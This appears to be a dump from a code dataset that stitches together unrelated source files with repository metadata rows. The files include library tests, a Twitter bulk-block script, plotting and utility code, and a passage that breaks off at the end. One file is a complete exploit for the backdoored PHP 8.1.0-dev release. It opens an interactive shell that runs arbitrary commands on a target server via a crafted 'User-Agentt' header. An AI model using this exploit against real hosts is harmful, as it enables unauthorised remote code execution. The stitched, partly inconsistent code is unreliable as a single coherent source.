Node('a', [
Field('c', None, f2),
]),
Root([
Link('b', Sequence[TypeRef['a']], f1, requires=None,
options=[option]),
]),
])
check_result(execute(graph, build([Q.b(**args)[Q.c]])),
{'b': [{'c': 'aunder'}]})
f1.assert_called_once_with(result)
f2.assert_called_once_with([q.Field('c')], [1])
def test_link_option_unknown():
test_link_option_valid(
Option('oleic', None), {'oleic': 2340, 'unknown': 8775}, {'oleic': 2340}
)
def test_link_option_missing():
graph = Graph([
Node('slices', [
Field('papeete', None, Mock()),
]),
Root([
Link('eclairs', Sequence[TypeRef['slices']], Mock(), requires=None,
options=[Option('nocks', None)]),
]),
])
with pytest.raises(TypeError) as err:
execute(graph, build([Q.eclairs[Q.papeete]]))
err.match(r'^Required option "nocks" for Link\(\'eclairs\', '
r'(.*) was not provided$')
def test_pass_context_field():
f = pass_context(Mock(return_value=['boiardo']))
graph = Graph([
Root([
Field('a', None, f),
]),
])
check_result(execute(graph, build([Q.a]), {'vetch': 'shadier'}),
{'a': 'boiardo'})
f.assert_called_once_with(ANY, [q.Field('a')])
ctx = f.call_args[0][0]
assert isinstance(ctx, Context)
assert ctx['vetch'] == 'shadier'
with pytest.raises(KeyError) as err:
_ = ctx['invalid'] # noqa
err.match('is not specified in the query context')
def test_pass_context_link():
f1 = pass_context(Mock(return_value=[1]))
f2 = Mock(return_value=[['boners']])
graph = Graph([
Node('a', [
Field('b', None, f2),
]),
Root([
Link('c', Sequence[TypeRef['a']], f1, requires=None),
]),
])
result = execute(graph, build([Q.c[Q.b]]), {'fibs': 'dossil'})
check_result(result, {'c': [{'b': 'boners'}]})
f1.assert_called_once_with(ANY)
f2.assert_called_once_with([q.Field('b')], [1])
ctx = f1.call_args[0][0]
assert isinstance(ctx, Context)
assert ctx['fibs'] == 'dossil'
with pytest.raises(KeyError) as err:
_ = ctx['invalid'] # noqa
err.match('is not specified in the query context')
def test_node_link_without_requirements():
f1 = Mock(return_value=[1])
f2 = Mock(return_value=[2])
f3 = Mock(return_value=[['arnhild']])
graph = Graph([
Node('a', [
Field('c', None, f3),
]),
Node('b', [
Link('d', Sequence[TypeRef['a']], f2, requires=None),
]),
Root([
Link('e', Sequence[TypeRef['b']], f1, requires=None),
]),
])
result = execute(graph, build([Q.e[Q.d[Q.c]]]))
check_result(result, {'e': [{'d': [{'c': 'arnhild'}]}]})
f1.assert_called_once_with()
f2.assert_called_once_with()
f3.assert_called_once_with([q.Field('c')], [2])
@pytest.mark.parametrize('value', [1, [], [1, 2]])
def test_root_field_func_result_validation(value):
with pytest.raises(TypeError) as err:
execute(
Graph([
Root([
Field('a', None, Mock(return_value=value)),
]),
]),
build([Q.a]),
)
err.match(re.escape(
"Can't store field values, node: '__root__', fields: ['a'], "
"expected: list (len: 1), returned: {value!r}"
.format(value=value)
))
@pytest.mark.parametrize('value', [1, [], [1, 2], [[], []], [[1], []],
[[], [2]]])
def test_node_field_func_result_validation(value):
with pytest.raises(TypeError) as err:
execute(
Graph([
Node('a', [
Field('b', None, Mock(return_value=value)),
]),
Root([
Link('c', Sequence[TypeRef['a']], Mock(return_value=[1, 2]),
requires=None),
]),
]),
build([Q.c[Q.b]]),
)
err.match(re.escape(
"Can't store field values, node: 'a', fields: ['b'], "
"expected: list (len: 2) of lists (len: 1), returned: {value!r}"
.format(value=value)
))
def test_root_link_many_func_result_validation():
with pytest.raises(TypeError) as err:
execute(
Graph([
Node('a', [
Field('b', None, Mock(return_value=[[3], [4]])),
]),
Root([
Link('c', Sequence[TypeRef['a']], Mock(return_value=123),
requires=None),
]),
]),
build([Q.c[Q.b]]),
)
err.match(re.escape(
"Can't store link values, node: '__root__', link: 'c', "
"expected: list, returned: 123"
))
@pytest.mark.parametrize('value', [1, [], [1, 2, 3]])
def test_node_link_one_func_result_validation(value):
with pytest.raises(TypeError) as err:
execute(
Graph([
Node('a', [
Field('b', None, Mock(return_value=[[1], [2]]))
]),
Node('c', [
Field('d', None, Mock(return_value=[[3], [4]])),
Link('e', TypeRef['a'], Mock(return_value=value),
requires='d'),
]),
Root([
Link('f', Sequence[TypeRef['c']], Mock(return_value=[1, 2]),
requires=None),
]),
]),
build([Q.f[Q.e[Q.b]]]),
)
err.match(re.escape(
"Can't store link values, node: 'c', link: 'e', expected: "
"list (len: 2), returned: {!r}".format(value)
))
@pytest.mark.parametrize('value', [1, [], [1, []], [[], 2], [[], [], []]])
def test_node_link_many_func_result_validation(value):
with pytest.raises(TypeError) as err:
execute(
Graph([
Node('a', [
Field('b', None, Mock(return_value=[[1], [2]]))
]),
Node('c', [
Field('d', None, Mock(return_value=[[3], [4]])),
Link('e', Sequence[TypeRef['a']], Mock(return_value=value),
requires='d'),
]),
Root([
Link('f', Sequence[TypeRef['c']], Mock(return_value=[1, 2]),
requires=None),
]),
]),
build([Q.f[Q.e[Q.b]]]),
)
err.match(re.escape(
"Can't store link values, node: 'c', link: 'e', expected: "
"list (len: 2) of lists, returned: {!r}".format(value)
))
def test_root_field_alias():
data = {'a': 42}
def root_fields(fields):
return [data[f.name] for f in fields]
graph = Graph([
Root([
Field('a', None, root_fields),
]),
])
result = execute(graph, q.Node([
q.Field('a', alias='a1'),
q.Field('a', alias='a2'),
]))
check_result(result, {'a1': 42, 'a2': 42})
def test_node_field_alias():
data = {'x1': {'a': 42}}
@listify
def x_fields(fields, ids):
for i in ids:
yield [data[i][f.name] for f in fields]
graph = Graph([
Node('X', [
Field('a', None, x_fields),
]),
Root([
Link('x', TypeRef['X'], lambda: 'x1', requires=None),
]),
])
result = execute(graph, q.Node([
q.Link('x', q.Node([
q.Field('a', alias='a1'),
q.Field('a', alias='a2'),
])),
]))
check_result(result, {'x': {'a1': 42, 'a2': 42}})
def test_root_link_alias():
data = {
'xN': {'a': 1, 'b': 2},
}
@listify
def x_fields(fields, ids):
for i in ids:
yield [data[i][f.name] for f in fields]
graph = Graph([
Node('X', [
Field('a', None, x_fields),
Field('b', None, x_fields),
]),
Root([
Link('x', TypeRef['X'], lambda: 'xN', requires=None),
]),
])
result = execute(graph, q.Node([
q.Link('x', q.Node([q.Field('a')]), alias='x1'),
q.Link('x', q.Node([q.Field('b')]), alias='x2'),
]))
check_result(result, {
'x1': {'a': 1},
'x2': {'b': 2},
})
def test_node_link_alias():
data = {
'yN': {'a': 1, 'b': 2},
}
x2y = {'xN': 'yN'}
@listify
def y_fields(fields, ids):
for i in ids:
yield [data[i][f.name] for f in fields]
graph = Graph([
Node('Y', [
Field('a', None, y_fields),
Field('b', None, y_fields),
]),
Node('X', [
Field('id', None, id_field),
Link('y', TypeRef['Y'],
lambda ids: [x2y[i] for i in ids],
requires='id'),
]),
Root([
Link('x', TypeRef['X'], lambda: 'xN', requires=None),
]),
])
result = execute(graph, q.Node([
q.Link('x', q.Node([
q.Link('y', q.Node([q.Field('a')]), alias='y1'),
q.Link('y', q.Node([q.Field('b')]), alias='y2'),
])),
]))
check_result(result, {
'x': {
'y1': {'a': 1},
'y2': {'b': 2},
}
})
def test_conflicting_fields():
x_data = {'xN': {'a': 42}}
@listify
def x_fields(fields, ids):
for i in ids:
yield ['{}-{}'.format(x_data[i][f.name], f.options['k'])
for f in fields]
graph = Graph([
Node('X', [
Field('a', None, x_fields, options=[Option('k', Integer)]),
]),
Root([
Link('x1', TypeRef['X'], lambda: 'xN', requires=None),
Link('x2', TypeRef['X'], lambda: 'xN', requires=None),
]),
])
result = execute(graph, q.Node([
q.Link('x1', q.Node([q.Field('a', options={'k': 1})])),
q.Link('x2', q.Node([q.Field('a', options={'k': 2})])),
]))
check_result(result, {
'x1': {'a': '42-1'},
'x2': {'a': '42-2'},
})
def test_conflicting_links():
data = {
'yA': {'a': 1, 'b': 2},
'yB': {'a': 3, 'b': 4},
'yC': {'a': 5, 'b': 6},
}
x2y = {'xN': ['yA', 'yB', 'yC']}
@listify
def y_fields(fields, ids):
for i in ids:
yield [data[i][f.name] for f in fields]
@listify
def x_to_y_link(ids, options):
for i in ids:
yield [y for y in x2y[i] if y not in options['exclude']]
graph = Graph([
Node('Y', [
Field('a', None, y_fields),
Field('b', None, y_fields),
]),
Node('X', [
Field('id', None, id_field),
Link('y', Sequence[TypeRef['Y']], x_to_y_link, requires='id',
options=[Option('exclude', None)]),
]),
Root([
Link('x1', TypeRef['X'], lambda: 'xN', requires=None),
Link('x2', TypeRef['X'], lambda: 'xN', requires=None),
]),
])
result = execute(graph, q.Node([
q.Link('x1', q.Node([
q.Link('y', q.Node([q.Field('a')]),
options={'exclude': ['yA']}),
])),
q.Link('x2', q.Node([
q.Link('y', q.Node([q.Field('b')]),
options={'exclude': ['yC']}),
])),
]))
check_result(result, {
'x1': {'y': [{'a': 3}, {'a': 5}]},
'x2': {'y': [{'b': 2}, {'b': 4}]},
})
def test_process_ordered_node():
ordering = []
def f1(fields):
names = tuple(f.name for f in fields)
ordering.append(names)
return names
def f2(fields):
return f1(fields)
def f3():
ordering.append('x1')
return 'x1'
@listify
def f4(fields, ids):
for i in ids:
yield ['{}-e'.format(i) for _ in fields]
graph = Graph([
Node('X', [
Field('e', None, f4),
]),
Root([
Field('a', None, f1),
Field('b', None, f1),
Field('c', None, f2),
Field('d', None, f2),
Link('x', TypeRef['X'], f3, requires=None),
]),
])
query = q.Node([
q.Field('d'),
q.Field('b'),
q.Field('a'),
q.Link('x', q.Node([
q.Field('e'),
])),
q.Field('c'),
], ordered=True)
engine = Engine(SyncExecutor())
result = engine.execute(graph, query)
check_result(result, {
'a': 'a',
'b': 'b',
'c': 'c',
'd': 'd',
'x': {
'e': 'x1-e',
},
})
assert ordering == [('d',), ('b', 'a'), 'x1', ('c',)]
| 27.780526
| 80
| 0.476355
| 0
| 0
| 5,684
| 0.316235
| 5,150
| 0.286525
| 0
| 0
| 2,284
| 0.127072
|
65a1c52735b77b5b062b18c86f7b8f8507e5e9d2
| 90
|
py
|
Python
|
helper.py
|
b-nguyen/cs3240-labdemo
|
ee8da87092bc46d6a774fa5030283224819a4b87
|
[
"MIT"
] | null | null | null |
helper.py
|
b-nguyen/cs3240-labdemo
|
ee8da87092bc46d6a774fa5030283224819a4b87
|
[
"MIT"
] | null | null | null |
helper.py
|
b-nguyen/cs3240-labdemo
|
ee8da87092bc46d6a774fa5030283224819a4b87
|
[
"MIT"
] | null | null | null |
__author__ = 'Brian Nguyen'
def greeting(msg):
print("We would like to say: " + msg)
| 18
| 41
| 0.655556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 38
| 0.422222
|
65a24baaac6c0fcc20473db9883448f3352703ee
| 6,251
|
py
|
Python
|
twitter_verified_blocker.py
|
antoinemcgrath/twitter_blocker_tool
|
f4c0ed866830259a5ae6844dbb5fbdac8b3674b2
|
[
"MIT"
] | null | null | null |
twitter_verified_blocker.py
|
antoinemcgrath/twitter_blocker_tool
|
f4c0ed866830259a5ae6844dbb5fbdac8b3674b2
|
[
"MIT"
] | null | null | null |
twitter_verified_blocker.py
|
antoinemcgrath/twitter_blocker_tool
|
f4c0ed866830259a5ae6844dbb5fbdac8b3674b2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
#### A tool for blocking all verified users on Twitter.
## You may want to create a (public or private) Twitter list named 'exceptions' and add verified users to it.
## This 'exceptions' list that you create on Twitter is for verified accounts that you like and do not want to block.
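## For reference, a hypothetical /usr/local/keys.json layout. The key names are taken
## from the manual-entry fallback below; the platform/account/app names are placeholders:
## {
##     "Twitter": {
##         "YourAccount": {
##             "YourApp": {
##                 "Consumer Key (API Key)": "...",
##                 "Consumer Secret (API Secret)": "...",
##                 "Bearer Token": "...",
##                 "Owner": "your_twitter_username"
##             }
##         }
##     }
## }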
#### Import dependencies
import json
import tweepy
import re
import random
import sys
import timeit
#### Define variables
start = timeit.default_timer()
exception_title = 'exceptions'
mypath = "blocked.txt"
counter = 0
def get_api_keys():
#### Set Twitter API key dictionary
try: #### Attempt to load API keys file
keys_json = json.load(open('/usr/local/keys.json'))
#### Specify key dictionary wanted (generally [Platform][User][API])
Keys = keys_json["Twitter"]["ClimateCong_Bot"]["ClimatePolitics"]
#Keys = keys_json["Twitter"]["AGreenDCBike"]["HearHerVoice"]
except Exception as e:
er = e
if er.errno == 2: # File not found; enter key dictionary values manually
print("\nNo twitter API key was found in /usr/local/keys.json\n",
"Acquire an API key at https://apps.twitter.com/\n",
"to supply key manually press Enter\n")
Keys = {}
Keys['Consumer Key (API Key)'] = input('Enter the Twitter API Consumer Key\n')
Keys['Consumer Secret (API Secret)'] = input('Enter the Twitter API Consumer Secret Key\n')
Keys['Bearer Token'] = input('Enter the Bearer Token\n')
Keys['Owner'] = input('Enter your Twitter username associated with the API keys\n')
else:
print(e)
return(Keys)
#### Get keys
Keys = get_api_keys()
#### Access Twitter API using Tweepy & key dictionary definitions
client = tweepy.Client( Keys['Bearer Token'] )
auth = tweepy.OAuth2AppHandler( Keys['Consumer Key (API Key)'], Keys['Consumer Secret (API Secret)'] )
api = tweepy.API(auth)
#### Screen name used for the list and follower lookups below (assumed to be the API key owner)
user = Keys.get('Owner')
#### Fetch the user id's of those listed in the exceptions list
def get_exceptions_list():
listed = []
protect_list = []
for page in tweepy.Cursor(api.list_members, user, exception_title).pages():
listed.extend(page)
for x in listed:
protect_list.append(x.id)
return(protect_list)
#### Checks id against exceptions list
def check_exceptions_list(a_user_id_2_block):
if a_user_id_2_block in protect_list:
#print("User is on exceptions list & will not be blocked:", a_user_id_2_block, end='\r')
return None
else:
return(a_user_id_2_block)
#### Returns a human readable time difference
def calc_time():
#Stop the timer
stop = timeit.default_timer()
total_time = stop - start
# Format the running time.
mins, secs = divmod(total_time, 60)
hours, mins = divmod(mins, 60)
timed = str("%d:%d:%d" % (hours, mins, secs))
return(timed)
#### Check if user is already blocked, blocks & add to list if not
def append_to_blocked_list(a_user_id_2_block):
with open(mypath, "r+", newline=None) as file:
for line in file:
if str(a_user_id_2_block) in line:
#print("Previously added to block list")
return None
else: # not found, we are at the eof
pass
file.write(str(a_user_id_2_block) + '\n') # append missing data
try:
api.create_block(a_user_id_2_block, wait_on_rate_limit=True)
except (ConnectionError, TimeoutError):
print("Will retry again in a little bit")
input("Press Enter to continue...")
except Exception as e:
er = e
if e.api_code == 160:
print("Request to befriend made, pending approval")
if e.api_code == 50:
print("User not found", str(a_user_id_2_block))
return("New")
#### Increments counter by 1, if count is divisible by 100 print the count & time elapsed.
def add_2_counter(counter):
counter += 1
if counter % 100 == 0:
timed = calc_time()
print("Time elapsed:", timed, " Users blocked:", str(counter))
else:
print(counter, end='\r')
pass
return(counter)
#### Process user id, check exceptions list, check & block & append to blocked list, trigger counter
def process_a_user_id(a_user_id, counter):
a_user_id_2_block = check_exceptions_list(a_user_id)
if a_user_id_2_block is not None:
#Check if user is already blocked & block if not
new_block = append_to_blocked_list(a_user_id_2_block)
if new_block is not None:
counter = add_2_counter(counter)
return(counter)
#### Get an id from user & send to id processing
def process_a_user(a_user, counter):
if a_user.verified == True:
a_user_id = a_user.id
counter = process_a_user_id(a_user_id, counter)
else:
pass
return(counter)
#### Work flow
#### Acquire 'exceptions' list for blocking protection/exclusion
protect_list = get_exceptions_list()
print("Protect list number of entries =", len(protect_list))
#### Block verified users that are on the twitter managed verified list
for a_user_id_2_block in tweepy.Cursor(api.friends_ids, id="verified", wait_on_rate_limit=True).items():
counter = process_a_user_id(a_user_id_2_block, counter)
#### Block verified users that are following you
for a_user in tweepy.Cursor(api.followers, screen_name=user, wait_on_rate_limit=True).items():
counter = process_a_user(a_user, counter)
#### Block verified users that are following the user handle "Twitter"
for a_user in tweepy.Cursor(api.followers, screen_name="Twitter", wait_on_rate_limit=True).items():
counter = process_a_user(a_user, counter)
###################################################################
# Do not use any of the code I have written with harmful intent. #
# #
# By using this code you accept that everyone has the #
# right to choose their own gender identity. #
###################################################################
| 38.58642
| 117
| 0.628379
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,838
| 0.454007
|
65a29ad725144c4d2dc24167982660ac5a79324c
| 586
|
py
|
Python
|
src/pktmapper/common.py
|
Sapunov/pktmapper
|
9d72a42c5b756c10c7fb0debcfc6c20031626aa1
|
[
"MIT"
] | null | null | null |
src/pktmapper/common.py
|
Sapunov/pktmapper
|
9d72a42c5b756c10c7fb0debcfc6c20031626aa1
|
[
"MIT"
] | null | null | null |
src/pktmapper/common.py
|
Sapunov/pktmapper
|
9d72a42c5b756c10c7fb0debcfc6c20031626aa1
|
[
"MIT"
] | null | null | null |
"""
Common functions
---
Package: PACKET-MAPPER
Author: Sapunov Nikita <kiton1994@gmail.com>
"""
import netaddr
import socket
def ip2str(address):
"""
Print out an IP address given a string
Args:
address (inet struct): inet network address
Returns:
str: Printable/readable IP address
"""
return socket.inet_ntop(socket.AF_INET, address)
def ip2long(ip):
"""
Convert an IP string to long.
Args:
ip: readable IP address
Returns:
long: IP address in long format
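Example (hypothetical input, for illustration):
ip2long("192.168.0.1") -> 3232235521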
"""
return int(netaddr.IPAddress(ip))
| 16.742857
| 52
| 0.641638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 411
| 0.701365
|
65a7dd3e05e8bc60ee17293d906552f32358fc04
| 1,236
|
py
|
Python
|
custom_packages/CustomNeuralNetworks/test_CustomNeuralNetworks/test_resnet50_unet.py
|
davidelomeo/mangroves_deep_learning
|
27ce24fe183b65f054c1d6b41417a64355cd0c9c
|
[
"MIT"
] | null | null | null |
custom_packages/CustomNeuralNetworks/test_CustomNeuralNetworks/test_resnet50_unet.py
|
davidelomeo/mangroves_deep_learning
|
27ce24fe183b65f054c1d6b41417a64355cd0c9c
|
[
"MIT"
] | null | null | null |
custom_packages/CustomNeuralNetworks/test_CustomNeuralNetworks/test_resnet50_unet.py
|
davidelomeo/mangroves_deep_learning
|
27ce24fe183b65f054c1d6b41417a64355cd0c9c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This script tests the function that builds the U-Net model combined
# with the ResNet50 model as an encoder. The test does not look for
# numerical values but checks whether the model returns an object or not.
# This is because there are several checks within the UNet class that
# validate the input parameters and return None if they are invalid.
# The test simply verifies that these preliminary checks work as intended.
#
# Author: Davide Lomeo
# Email: davide.lomeo20@imperial.ac.uk
# GitHub: https://github.com/acse-2020/acse2020-acse9-finalreport-acse-dl1420-3
# Date: 1 August 2021
# Version: 1.0
from CustomNeuralNetworks import resnet50_unet
def test_ResNet50Unet():
"Testing the ResNet50Unet class"
resnet50unet = resnet50_unet.ResNet50Unet(7)
function_output_1 = resnet50unet.build_model((256, 250, 3))
function_output_2 = resnet50unet.build_model((256, 256, -3))
function_output_3 = resnet50unet.build_model((300, 300, 3))
function_output_4 = resnet50unet.build_model((256, 256, 3))
assert function_output_1 is None
assert function_output_2 is None
assert function_output_3 is None
assert function_output_4 is not None
return
| 35.314286
| 79
| 0.755663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 669
| 0.541262
|
65a81a20a737d47906a247b2cf2e411a76cfdb20
| 1,988
|
py
|
Python
|
htb/Knife/exploit/49933.py
|
oonray/Notes
|
7e52bd058cce5ccf488977222fdb7d7e88aabbbf
|
[
"MIT"
] | null | null | null |
htb/Knife/exploit/49933.py
|
oonray/Notes
|
7e52bd058cce5ccf488977222fdb7d7e88aabbbf
|
[
"MIT"
] | null | null | null |
htb/Knife/exploit/49933.py
|
oonray/Notes
|
7e52bd058cce5ccf488977222fdb7d7e88aabbbf
|
[
"MIT"
] | null | null | null |
# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
# - https://hub.docker.com/r/phpdaily/php
# - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# References:
# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version, was published with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell on the host.
"""
#!/usr/bin/env python3
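# As described above, the backdoored interpreter passes the value of the
# "User-Agentt" header to zerodiumsystem(). For illustration only, a single
# (hypothetical) raw request such as the one below is enough to run a command:
#
#   GET / HTTP/1.1
#   Host: vulnerable-host
#   User-Agentt: zerodiumsystem('id');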
import os
import re
import requests
host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)
if str(response) == '<Response [200]>':
print("\nInteractive shell is opened on", host, "\nCan't access tty; job control turned off.")
try:
while 1:
cmd = input("$ ")
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"User-Agentt": "zerodiumsystem('" + cmd + "');"
}
response = request.get(host, headers = headers, allow_redirects = False)
current_page = response.text
stdout = current_page.split('<!DOCTYPE html>',1)
text = print(stdout[0])
except KeyboardInterrupt:
print("Exiting...")
exit()
else:
print("\r")
print(response)
print("Host is not available, aborting...")
exit()
| 37.509434
| 267
| 0.667505
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,365
| 0.68662
|
65a8a8d322da8f141e973ee61e8ca8e2f7c15699
| 2,271
|
py
|
Python
|
flashcards/cli.py
|
elliott-king/flashcards
|
5dd6ae3d996797b11e28b2bd8a5b0d6e038e1a5d
|
[
"MIT"
] | null | null | null |
flashcards/cli.py
|
elliott-king/flashcards
|
5dd6ae3d996797b11e28b2bd8a5b0d6e038e1a5d
|
[
"MIT"
] | null | null | null |
flashcards/cli.py
|
elliott-king/flashcards
|
5dd6ae3d996797b11e28b2bd8a5b0d6e038e1a5d
|
[
"MIT"
] | null | null | null |
"""
Module that contains the command line app.
Why does this file exist, and why not put this in __main__?
You might be tempted to import things from __main__ later, but that will cause
problems: the code will get executed twice:
- When you run `python -mflashcards` python will execute
``__main__.py`` as a script. That means there won't be any
``flashcards.__main__`` in ``sys.modules``.
- When you import __main__ it will get executed again (as a module) because
there's no ``flashcards.__main__`` in ``sys.modules``.
Also see (1) from http://click.pocoo.org/5/setuptools/#setuptools-integration
"""
import argparse
from .flashcards import start
parser = argparse.ArgumentParser(description='Command description.')
parser.add_argument('names', metavar='NAME', nargs=argparse.ZERO_OR_MORE,
help="A name of something.")
def get_arguments():
description = (
'Flashcards is a small command line tool used to study.\n'
'Shuffles the content for you and displays the title, once you think\n'
'you know the answer, by pressing [Enter] you can see the content.\n\n'
'Expected YML format (keywords are optional):\n\n'
'-\n'
' topic: Python\n'
' content: Is a widely used high-level programming language\n'
' created by Guido van Rossum and first released in 1991.\n'
' keywords: programming, language\n'
'-\n'
' topic: Javascript\n'
' content: Is a dynamic, untyped, and interpreted programming lang.\n')
formater = argparse.RawDescriptionHelpFormatter
parser = argparse.ArgumentParser(prog='flashcards', description=description,
formatter_class=formater)
parser.add_argument('file_name', metavar='FILE_NAME',
help='YML file with flashcards content')
parser.add_argument('-O', '--ordered', action="store_true", default=False,
help='Show cards keeping the file order')
parser.add_argument('-I', '--inverted', action="store_true", default=False,
help='Hide the topic instead of the content')
return parser.parse_args()
def main():
args = get_arguments()
start(args)
| 40.553571
| 80
| 0.65742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,429
| 0.629238
|
65a8c04b64b959ed6c434b2c56b2ea70ca122b10
| 744
|
py
|
Python
|
C2C/simple_server.py
|
muhammedabdelkader/python_collection
|
7084588ab983224ccc969f63688d62fcc988263a
|
[
"MIT"
] | null | null | null |
C2C/simple_server.py
|
muhammedabdelkader/python_collection
|
7084588ab983224ccc969f63688d62fcc988263a
|
[
"MIT"
] | null | null | null |
C2C/simple_server.py
|
muhammedabdelkader/python_collection
|
7084588ab983224ccc969f63688d62fcc988263a
|
[
"MIT"
] | null | null | null |
import aiohttp
import asyncio
import time
start_time = time.time()
async def get_pokemon(session,url):
async with session.get(url) as resp:
pokemon = await resp.json()
return pokemon["name"]
async def main():
async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(limit=64,verify_ssl=False)) as session:
tasks = []
for i in range(1,200):
pok_url = f"https://pokeapi.co/api/v2/pokemon/{i}"
tasks.append(asyncio.ensure_future(get_pokemon(session,pok_url)))
original_pokemon = await asyncio.gather(*tasks)
for pok in original_pokemon:
print(pok)
asyncio.run(main())
print(f"--{(time.time()-start_time)}--")
| 27.555556
| 111
| 0.629032
| 0
| 0
| 0
| 0
| 0
| 0
| 609
| 0.818548
| 79
| 0.106183
|
65a9792b2934e3a0bc3ead9a9eef72f6382f49c5
| 3,454
|
py
|
Python
|
Important_data/Thesis figure scripts/six_sigmoids.py
|
haakonvt/LearningTensorFlow
|
6988a15af2ac916ae1a5e23b2c5bde9630cc0519
|
[
"MIT"
] | 5
|
2018-09-06T12:52:12.000Z
|
2020-05-09T01:40:12.000Z
|
Important_data/Thesis figure scripts/six_sigmoids.py
|
haakonvt/LearningTensorFlow
|
6988a15af2ac916ae1a5e23b2c5bde9630cc0519
|
[
"MIT"
] | null | null | null |
Important_data/Thesis figure scripts/six_sigmoids.py
|
haakonvt/LearningTensorFlow
|
6988a15af2ac916ae1a5e23b2c5bde9630cc0519
|
[
"MIT"
] | 4
|
2018-02-06T08:42:06.000Z
|
2019-04-16T11:23:06.000Z
|
from matplotlib import rc
rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})
rc('text', usetex=True)
rc('legend',**{'fontsize':11}) # Font size for legend
from mpl_toolkits.axes_grid.axislines import SubplotZero
import matplotlib as mpl
mpl.rcParams['lines.linewidth'] = 2.5
import matplotlib.pyplot as plt
from math import erf,sqrt
import numpy as np
xmin = -4; xmax = 4
x = np.linspace(xmin,xmax,1001)
y1 = lambda x: np.array([erf(0.5*i*sqrt(np.pi)) for i in x])
y2 = lambda x: np.tanh(x)
y3 = lambda x: 4./np.pi*np.arctan(np.tanh(np.pi*x/4.))
y4 = lambda x: x/np.sqrt(1.+x**2)
y5 = lambda x: 2.0/np.pi*np.arctan(np.pi/2.0 * x)
y6 = lambda x: x/(1+np.abs(x))
fig = plt.figure(1)
ax = SubplotZero(fig, 111)
fig.add_subplot(ax)
plt.subplots_adjust(left = 0.125, # the left side of the subplots of the figure
right = 0.9, # the right side of the subplots of the figure
bottom = 0.1, # the bottom of the subplots of the figure
top = 0.9, # the top of the subplots of the figure
wspace = 0., # the amount of width reserved for blank space between subplots
hspace = 0.) # the amount of height reserved for white space between subplots
plt.setp(ax, xticks=[-3,-2,-1,1,2,3], xticklabels=[" "," "," "," "," "," ",], yticks=[-1,1], yticklabels=[" "," ",])
# Make coordinate axes with "arrows"
for direction in ["xzero", "yzero"]:
ax.axis[direction].set_visible(True)
# Coordinate axes with arrow (guess what, these are the arrows)
plt.arrow(2.65, 0.0, 0.5, 0.0, color="k", clip_on=False, head_length=0.06, head_width=0.08)
plt.arrow(0.0, 1.03, 0.0, 0.1, color="k", clip_on=False, head_length=0.06, head_width=0.08)
# Remove edge around the entire plot
for direction in ["left", "right", "bottom", "top"]:
ax.axis[direction].set_visible(False)
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
colormap = plt.cm.Spectral #nipy_spectral # Other possible colormaps: Set1, Accent, nipy_spectral, Paired
colors = [colormap(i) for i in np.linspace(0, 1, 6)]
plt.title("Six sigmoid functions", fontsize=18, y=1.08)
leg_list = [r"$\mathrm{erf}\left(\frac{\sqrt{\pi}}{2}x \right)$",
r"$\tanh(x)$",
r"$\frac{2}{\pi}\mathrm{gd}\left( \frac{\pi}{2}x \right)$",
r"$x\left(1+x^2\right)^{-\frac{1}{2}}$",
r"$\frac{2}{\pi}\mathrm{arctan}\left( \frac{\pi}{2}x \right)$",
r"$x\left(1+|x|\right)^{-1}$"]
for i in range(1,7):
s = "ax.plot(x,y%s(x),color=colors[i-1])" %(str(i))
eval(s)
ax.legend(leg_list,loc="best", ncol=2, fancybox=True) # title="Legend", fontsize=12
# ax.grid(True, which='both')
ax.set_aspect('equal')
ax.set_xlim([-3.1,3.1])
ax.set_ylim([-1.1,1.1])
ax.annotate('1', xy=(0.08, 1-0.02))
ax.annotate('0', xy=(0.08, -0.2))
ax.annotate('-1', xy=(0.08, -1-0.03))
for i in [-3,-2,-1,1,2,3]:
ax.annotate('%s' %str(i), xy=(i-0.03, -0.2))
maybe = raw_input("\nUpdate figure directly in master thesis?\nEnter 'YES' (anything else = ONLY show to screen) ")
if maybe == "YES": # Only save to disc if need to be updated
filenameWithPath = "/Users/haakonvt/Dropbox/uio/master/latex-master/Illustrations/six_sigmoids.pdf"
plt.savefig(filenameWithPath, bbox_inches='tight') #, pad_inches=0.2)
print 'Saved over previous file in location:\n "%s"' %filenameWithPath
else:
print 'Figure was only shown on screen.'
plt.show()
| 40.635294
| 116
| 0.630573
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,438
| 0.416329
|
65aa73e15457005cd520549df842b9dc33211c7c
| 3,820
|
py
|
Python
|
src/web/modules/search/controllers/search/control.py
|
unkyulee/elastic-cms
|
3ccf4476c3523d4fefc0d8d9dee0196815b81489
|
[
"MIT"
] | 2
|
2017-04-30T07:29:23.000Z
|
2017-04-30T07:36:27.000Z
|
src/web/modules/search/controllers/search/control.py
|
unkyulee/elastic-cms
|
3ccf4476c3523d4fefc0d8d9dee0196815b81489
|
[
"MIT"
] | null | null | null |
src/web/modules/search/controllers/search/control.py
|
unkyulee/elastic-cms
|
